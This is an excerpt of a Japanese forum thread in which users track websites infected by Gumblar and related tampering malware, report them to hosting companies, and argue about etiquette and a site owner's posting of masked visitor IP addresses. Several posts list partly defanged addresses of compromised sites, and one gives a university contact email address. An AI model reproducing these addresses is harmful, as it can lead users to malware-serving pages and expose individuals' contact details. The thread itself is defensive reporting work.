表示に問題ありませんでしたぁ~(笑)
だいじょうぶですぅ~

っていうアフェなのが来たことがあった。 
その後鯖屋の手によって封鎖されたんだが…

472:名無しさん@お腹いっぱい。
10/02/14 15:30:01
URLリンク(bukatsu)<)。 com/

473:名無しさん@お腹いっぱい。
10/02/14 15:32:28
>>472
やめろや
ちゃんとルール守ろうね

ママのおっぱいでも吸っとけば?


474:名無しさん@お腹いっぱい。
10/02/14 15:38:42
>>435

デジロの通報ってこっちだよね?
URLリンク(www.value-domain.com)

475:名無しさん@お腹いっぱい。
10/02/14 15:41:47
なんか法政大学に繋がるメールアドレスが見当たらないんだが・・・これは連絡は電話だけに限るってか・・・?
whoisにも連絡出来るようなアドレス無いし・・・

476:へたれ発掘屋
10/02/14 15:44:41
>>467
スマソ・・・orz

トップページもオワタ
URLリンク(s1)●shard●jp/dreaming/


477:名無しさん@お腹いっぱい。
10/02/14 15:52:17
>>475
IPドメインサーチで担当者情報を検索

478:名無しさん@お腹いっぱい。
10/02/14 15:55:47
>>475
iwatsuki at k.hosei.ac.jp

479:名無しさん@お腹いっぱい。
10/02/14 16:04:20 BE:4401874-2BP(1236)
今北

>>474
そちらでよさそうですね。
>>435にはメアドがあるのでめるぽに使ってました。

>>438
めるぽしました。

480:472
10/02/14 16:10:28
>>473
おまえさんのブラウザはスペースが入っててもリンクになるのかw


http //www.damu7●com/kaisiha/
デジロにも通報した

481:名無しさん@お腹いっぱい。
10/02/14 16:12:34
まぁ誤記防ぐような機能でURLにスペースあっても無視して繋げるようなブラウザは有ったようなないような

482:472
10/02/14 16:14:11
そうなのか…

だったらスマソ

483:名無しさん@お腹いっぱい。
10/02/14 16:45:35
FC2から注意しろってめーるが来た

484:名無しさん@お腹いっぱい。
10/02/14 16:53:12
めるぼしました

485:名無しさん@お腹いっぱい。
10/02/14 17:22:21
URLリンク(www.tanpopo-clinic)●jp
直った?

486:名無しさん@お腹いっぱい。
10/02/14 17:24:14 BE:8489096-2BP(1236)
>>441
URLリンク(whois.domaintools.com)
URLリンク(whois.nic.ad.jp)
whoisからめるぽしました。

落ちまふ。ノシ

487:名無しさん@お腹いっぱい。
10/02/14 17:24:25
このスレだけで3回は見たわ

488:名無しさん@お腹いっぱい。
10/02/14 17:39:17
>>485
中途半端なことするなボケ

489:名無しさん@お腹いっぱい。
10/02/14 19:04:05
akrapovic●sakura●ne●jp/m06/
akrapovic●sakura●ne●jp/m08/
akrapovic●sakura●ne●jp/mr02/
akrapovic●sakura●ne●jp/mr07/
cocoro-dhp●sakura●ne●jp/

490:名無しさん@お腹いっぱい。
10/02/14 19:07:24
>>489
一番下は違うだろ

491:名無しさん@お腹いっぱい。
10/02/14 19:08:28
>>489

cocoro-dhp激しいなこれ・・・
何が混ざってるかもうわかんない><;

492:名無しさん@お腹いっぱい。
10/02/14 19:26:38
xn--oyr98sizl●xn--n8jmt0y●jp/index.html

493:名無しさん@お腹いっぱい。
10/02/14 19:38:38
aguseってJavaScriptを有効にしないと使えないのかよ。
一応対策としてJavaScript切ってんのに

494:名無しさん@お腹いっぱい。
10/02/14 19:53:43
<script>function~は暫く前からあったぞ

↓危険! アクセス注意!↓
URLリンク(www)<)
こっちのチェッカーを使えばソースが見れるはず

495:名無しさん@お腹いっぱい。
10/02/14 20:17:53
まだ作った奴捕まってないのか?

496:名無しさん@お腹いっぱい。
10/02/14 20:20:53
URLリンク(www.stardustpictures)●co●jp/wasureai/
ここって感染してる?

497:名無しさん@お腹いっぱい。
10/02/14 20:24:17
>>496
中途半端なんじゃ ボケ
氏ね

498:名無しさん@お腹いっぱい。
10/02/14 20:26:45
>>496
8080系

499:名無しさん@お腹いっぱい。
10/02/14 20:36:36
>>496
大きな会社だから通報しますた
あの芸能事務所系だし…

500:名無しさん@お腹いっぱい。
10/02/14 20:40:40
>>499
小さい会社なら通報しないんか
うぜーなそういう奴
どんな性格がだいたいわかるわ


501:名無しさん@お腹いっぱい。
10/02/14 20:46:37
(キリッ

502:名無しさん@お腹いっぱい。
10/02/14 20:48:58
自分は何もしないくせに文句だけ言うんか
うぜーなそういう奴
どんな性格がだいたいわかるわ

503:名無しさん@お腹いっぱい。
10/02/14 21:04:35
今日は食が進むわ

504:名無しさん@お腹いっぱい。
10/02/14 21:14:04
チキンうめwwww

505:名無しさん@お腹いっぱい。
10/02/14 21:40:59
チキン・・・・・・?
チョコは?

506:名無しさん@お腹いっぱい。
10/02/14 21:55:42
チョコ?
そんなもん金曜日に全部食べたわ
今年は8個
まぁまぁかな

507:名無しさん@お腹いっぱい。
10/02/14 23:11:20
***.249.123.1**様、***.97.205.1**様、***.200.38.**様、***.48.184.1**様
***.231.203.23*様、***.126.173.3*様、***.236.78.15*様、**.244.194.8*様
***.110.16.9*様、***.128.191.5*様、**.62.192.19*様
危険な中確かめに来ていただいてありがとうございました。

メールをくださった方、この度は連絡していただいてありがとうございました。

本当ならば、おひとりづつお礼のメールを差し上げたいのですが、
すでに連絡の取れなくなっているアドレス(捨てアド?)から送っていただいた方が
多いのでこちらでまとめて書かせていただきます。

一つだけ質問があるのですが、>>492様はどちらでこのページを見つけたのですか?
身内向けのページなので検索避けしてあったのですが…

508:名無しさん@お腹いっぱい。
10/02/14 23:19:04
>>507
ここに一部伏せたとはいえIP書くと脅してるみたい

509:507
10/02/14 23:21:52
>>508
そうなんですか!?
2チャンネルはよくわからなくて…

こちらもメールで教えていただいたんです。

510:名無しさん@お腹いっぱい。
10/02/14 23:23:33
普通に考えてIPなんか晒されたくないよ
なんで「連絡をくれた方々」じゃいけんかったんじゃ

511:名無しさん@お腹いっぱい。
10/02/14 23:24:22
なんだこいつ
IPフェチか

512:名無しさん@お腹いっぱい。
10/02/14 23:25:56
( ´,_ゝ`) プッ

513:名無しさん@お腹いっぱい。
10/02/14 23:28:19
ウイルスに感染してメールが来て2chにお礼をしにきたら煽り入れられて・・・踏んだり蹴ったりですね
同情します

514:名無しさん@お腹いっぱい。
10/02/14 23:31:18
>>507,508
IP全部じゃなくて一部隠してる理由は何?
全部晒すのは良くないと思ってるからじゃないの?
よくわからないのなら全部晒せばいいだろうに

それらのIPが外部の者だとすぐにわかるってことは相当身内のみなんだろうな
>>492以前のログが身内しかなければ身内による通報だってことだよ
直前にアクセスした人とは限らないが

515:名無しさん@お腹いっぱい。
10/02/14 23:32:57
>>507
氏ねカス

516:名無しさん@お腹いっぱい。
10/02/14 23:36:43
>>507
URLリンク(www.google.co.jp)

517:名無しさん@お腹いっぱい。
10/02/14 23:40:58
>>507
分からないふりして恫喝しに来たんだろう。モロバレ。

518:名無しさん@お腹いっぱい。
10/02/14 23:42:37
>>507
どう見ても私のIPはいってます。本当にありがとうございました。

wgetしてるから危険も何もないんですけどねwww

519:名無しさん@お腹いっぱい。
10/02/14 23:44:43
>>507
親切で教えたのに何その態度
その身内全員ウィルスに感染してるかもしれないのでチェック忘れずに

520:名無しさん@お腹いっぱい。
10/02/14 23:48:54
>>一つだけ質問があるのですが、>>492様はどちらでこのページを見つけたのですか?

これが言いたかったわけね……

521:名無しさん@お腹いっぱい。
10/02/14 23:51:00
それよりもどんなウイルスを食らってるか心配したほうがいいと思う 管理者も閲覧者も

522:名無しさん@お腹いっぱい。
10/02/14 23:53:28
>>507
IPアドレス晒すなksg
キチガイ乙

523:507
10/02/14 23:55:26
ええと…
本当にごめんなさい。

今、兄に代筆してもらい削除依頼をしてもらいました。
それとここに通報した人は兄でした。 
ブックマークの中からみつけたそうです。

ごめんなさい。

524:名無しさん@お腹いっぱい。
10/02/14 23:55:33
>>507
1.tet
URLリンク(www.virustotal.com)
2.tet
URLリンク(www.virustotal.com)
3.txt
URLリンク(www.virustotal.com)

525:名無しさん@お腹いっぱい。
10/02/14 23:56:00
感染したサイトのURLをリンク化させるなって人は
とりあえず、Jane系のブラウザ使ってる人限定だけど

<ex>.[tab]●[tab]msg[tab]<0>Web改竄ウイルス総合スレ

[tab]はキーボードのタブキーを押してタブ文字を入れて
これをReplaceStr.txtに追加してくれ
そうすると、レス本文の中にあるコロンの文字が置換される

StyleとNida向けにはスレのタイトルに”Web改竄ウイルス総合スレ”が含まれていると置換対象になる
Viewだと置換対象のスレッドを特定することが難しいだろうから、他のスレに誤爆する可能性大
後、危険のない安全なサイトのURLにも誤爆するから、導入する人はそれを覚悟で頼む

526:名無しさん@お腹いっぱい。
10/02/15 00:09:51
>>525
公共のために言ってるんだからそういうことじゃないだろ

527:名無しさん@お腹いっぱい。
10/02/15 00:23:42
>>525
何を言ってるんだね?

528:名無しさん@お腹いっぱい。
10/02/15 00:25:27
>>525
冒頭2行からしておかしいけど
・・・全てが狂ってる

529:名無しさん@お腹いっぱい。
10/02/15 00:49:27
>>525
対症療法としてはありだが、リンク自体を殺せと言ってるに等しい。

530:名無しさん@お腹いっぱい。
10/02/15 01:19:55
>>523
削除依頼をしても消されません。
発信者情報は削除要請では投稿した時に一部の人を除いて強制表示される仕組みです。

マナーの問題として善意でメールした人のアドレスを晒すのどうかとは思います。

531:名無しさん@お腹いっぱい。
10/02/15 01:21:47
>>530
IPアドレスを晒しちゃ駄目なの?
全く問題無いだろ

532:名無しさん@お腹いっぱい。
10/02/15 01:29:12
全くってことはない

533:名無しさん@お腹いっぱい。
10/02/15 01:43:21
>>531
強制開示している掲示板もあります。しかし、それは投稿者が承知して書き込む前提です。
嫌なら書かなければ良いです。駄目とかでは無く530で言うようにマナーの問題です。

534:名無しさん@お腹いっぱい。
10/02/15 02:32:48
専ブラの場合、適当なテキストブラウザ入れてそのブラウザで開くようパスを指定すればいいんじゃないか。
テキストブラウザの設定もソースで開くにすれば即調査できる。

535:名無しさん@お腹いっぱい。
10/02/15 05:54:35
検索回避なんて
紳士協定ですからー

536:名無しさん@お腹いっぱい。
10/02/15 07:26:31
本気で回避したけりゃ
認証入れろってことだわな

537:名無しさん@お腹いっぱい。
10/02/15 08:16:29
まー認証入れてたら、入れる中から指摘するやつが現れないと発覚しないからな
気づいたときには全員感染済みとか有り得る

538:名無しさん@お腹いっぱい。
10/02/15 12:40:52
>>534
ルールを守れないアフォは来なくていいから

539:名無しさん@お腹いっぱい。
10/02/15 12:46:17
>>470
>>471
外部からの指摘メールは余計な作業を増やす原因
と思っている方が多いようです。

返事やお礼なんか一切ないです。

・・・訂正 少し反応ありました。
「あんたのパソコンこわれてるんじゃないの?」
「外注先にまかせてるのでわかりません」
など
甚だしいのは
「みつけたんならなおしといて」
(T_T)


540:名無しさん@お腹いっぱい。
10/02/15 12:56:31
めるぽ人乙すぐる;;

541:名無しさん@お腹いっぱい。
10/02/15 13:01:31
>>539
聞く耳持たないクソ企業が損害受けるだけならザマーなんだけど
これはそうじゃないのがつらいとこだね。。

542:名無しさん@お腹いっぱい。
10/02/15 13:05:13
>>539
あんたのパソコンこわれているんじゃないのじゃねえよなw
あんたのサイトがみんなのパソコン壊してんのに。

543:名無しさん@お腹いっぱい。
10/02/15 13:08:21
鯖缶って馬鹿でも出来る職業なの

544:名無しさん@お腹いっぱい。
10/02/15 13:22:29
前スレだか前々スレに来てた鯖缶を見る限りはそうなんだろうなw

545:名無しさん@お腹いっぱい。
10/02/15 13:23:11
>>543
サーバ管理者は関係ないだろ

546:名無しさん@お腹いっぱい。
10/02/15 13:24:21
うん

547:名無しさん@お腹いっぱい。
10/02/15 13:26:00
>>544
何それ 気になるから貼って

548:名無しさん@お腹いっぱい。
10/02/15 13:27:08
相変わらずfile.exe 実行中に落ちるだけで感染せず・・・orz
もうまんどくさくなってきたw

549:名無しさん@お腹いっぱい。
10/02/15 13:31:38
そういやSEOに関するHPもちょこちょこやられてるな。
SEO業者って案外PCに関する知識無いからな・・・

SEO業者って すごくきけん!!

550:名無しさん@お腹いっぱい。
10/02/15 13:33:51
URLリンク(emoto-shokai)●sakura●ne●jp/
既出?

551:名無しさん@お腹いっぱい。
10/02/15 13:43:00
>>550
氏ね

552:名無しさん@お腹いっぱい。
10/02/15 14:02:42
SEO業者ってページ作ったらほったらかしなんじゃないの

553:名無しさん@お腹いっぱい。
10/02/15 15:37:47
>>551
なんで>>550が氏ねって言われないといけないんだよ
ドットは●に変換されてるぞ?まさか「-」まで●にしろとか基地外発言するんじゃないだろうな?

所で誰か法政大社会学部公式サイトの改ざんの連絡した奴いる?

554:名無しさん@お腹いっぱい。
10/02/15 15:56:01
>>547
探して貼るの面倒だが流れとしては
経費削減でパソコンに詳しいと思われて無理矢理サーバ管理者にされた聞くも涙な話があった。

555:名無しさん@お腹いっぱい。
10/02/15 15:56:23
と思ったらページ消されてた
>>449該当ページの削除を確認

556:名無しさん@お腹いっぱい。
10/02/15 16:13:32
>>553
ttpが残ってると専ブラとかだとリンクになるからじゃないかな?

557:へたれ発掘屋
10/02/15 16:19:11
【8080系】
URLリンク(www)<)●ananya●jp/index●html ←ぉ?
海外(検体取得に...)
URLリンク(jaguarracing)<)●com/BANDS_AND_GIGS/index_CIARA●html


崩壊サイトが多くなってきたー


【Gumblar】
URLリンク(www)<)●tailor●co●jp/hs●html


558:名無しさん@お腹いっぱい。
10/02/15 16:19:28
だから専ブラで誤ってクリックしても大丈夫なように>>534の様な対策とれってことだな。
いくら言ってもドットは●に変換しない人が出てくるわけで。

559:名無しさん@お腹いっぱい。
10/02/15 16:39:28
www●luna-ashiya●jp/rental-studio/index●html
www●scc●u-tokai●ac●jp/club/tennis/index●htm

前スレみれないから既出かどうか確認出来てませんが。
このスレも確認しましたけど見落としてるかも・・・

560:名無しさん@お腹いっぱい。
10/02/15 16:41:28
www だけでええやろ

俺が許すから

561:名無しさん@お腹いっぱい。
10/02/15 16:43:34
*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** http://は不要。 www からどうぞ。 俺が許すから ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***



562:名無しさん@お腹いっぱい。
10/02/15 17:00:07
>>556
tpだけでもjaneはリンクにしてくれる

まあうっかり踏む奴も問題

563:名無しさん@お腹いっぱい。
10/02/15 17:10:55
>>417>>496
封鎖確認

ところで、いつまで待っても対応しない奴ってIPAにも通報するべきか
意味ない?

564:名無しさん@お腹いっぱい。
10/02/15 17:13:02
>>563
鯖屋に連絡が1番だと思うが。

565:名無しさん@お腹いっぱい。
10/02/15 17:16:23
>563
まぴょーん

566:名無しさん@お腹いっぱい。
10/02/15 17:18:44
基本的にはサイト作成者ではなく鯖管理者に連絡してるわ
作成者に連絡してもほっとんど意味がない

あとはこのへんとか
URLリンク(www.jpcert.or.jp)

567:名無しさん@お腹いっぱい。
10/02/15 17:36:59
対策済URL(●付き)にガタガタ文句を言う腰抜けは

こ の ス レ に 来 る な !

568:名無しさん@お腹いっぱい。
10/02/15 17:42:27
>>557の8080系の2番目
復号する場所が変だったので修正しました。
URLリンク(gumblar.s1.dynamitelife.net)


569:名無しさん@お腹いっぱい。
10/02/15 18:20:32
URLリンク(hoso)●it-bunka●com/shinkansen/
DEBUG改

570:名無しさん@お腹いっぱい。
10/02/15 18:23:24
・このスレを見る
・うっかり踏む
・脆弱性を残したまま
・セキュリティーがうんこ

これだけのバカしなければ被害も出ない。

571:名無しさん@お腹いっぱい。
10/02/15 18:44:46
>>570
VBってどう?うんこ?

572:名無しさん@お腹いっぱい。
10/02/15 18:54:17
素でVisualBasicかと思っt

宣伝力は業界1・2を争うくらいだと思うがセキュリティソフトとしては並くらい?

573:名無しさん@お腹いっぱい。
10/02/15 19:02:42
>>571
VeryBaka

574:名無しさん@お腹いっぱい。
10/02/15 19:06:10
VisualBasicの略だと思った俺死亡

自分で集めた検体を食わしたが...全く検出出来なかった
VeryBaka

575:名無しさん@お腹いっぱい。
10/02/15 19:13:08
マスターペニス

576:名無しさん@お腹いっぱい。
10/02/15 19:34:13
 :::::::::::/           ヽ::::::::::::
 :::::::::::|  糞  な  ガ  i::::::::::::
 :::::::::::.ゝ だ  ん   ン  ノ:::::::::::
 :::::::::::/  よ  て  ブ イ:::::::::::::
 :::::  |   。    ラ ゙i  ::::::
    \_      | ,,-'
 ―--、..,ヽ__  _,,-''
 :::::::,-‐、,‐、ヽ. )ノ      _,,...-
 :::::_|/ 。|。ヽ|-i、      ∠_:::::::::
 /. ` ' ● ' ニ 、     ,-、ヽ|:::::::::
 ニ __l___ノ     |・ | |, -、::
 / ̄ _  | i     ゚r ー'  6 |::
 |( ̄`'  )/ / ,..    i     '-
 `ー---―' / '(__ )   ヽ 、
 ====( i)==::::/      ,/ニニニ
 :/     ヽ:::i       /;;;;;;;;;;;;;;;;

577:名無しさん@お腹いっぱい。
10/02/15 20:03:12
>>572-574
㌧、よくわかった。
次の更新の時avastに乗り換えるわ。
半年くらい先だけど。

578:名無しさん@お腹いっぱい。
10/02/15 20:14:08
バスター(笑)使ってるけど問題ないけどなー。
まー何のソフト使ってるかが問題っていうより意識の問題が重要かと

579:名無しさん@お腹いっぱい。
10/02/15 20:45:20
まったく検出しないからサクサク軽快です


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch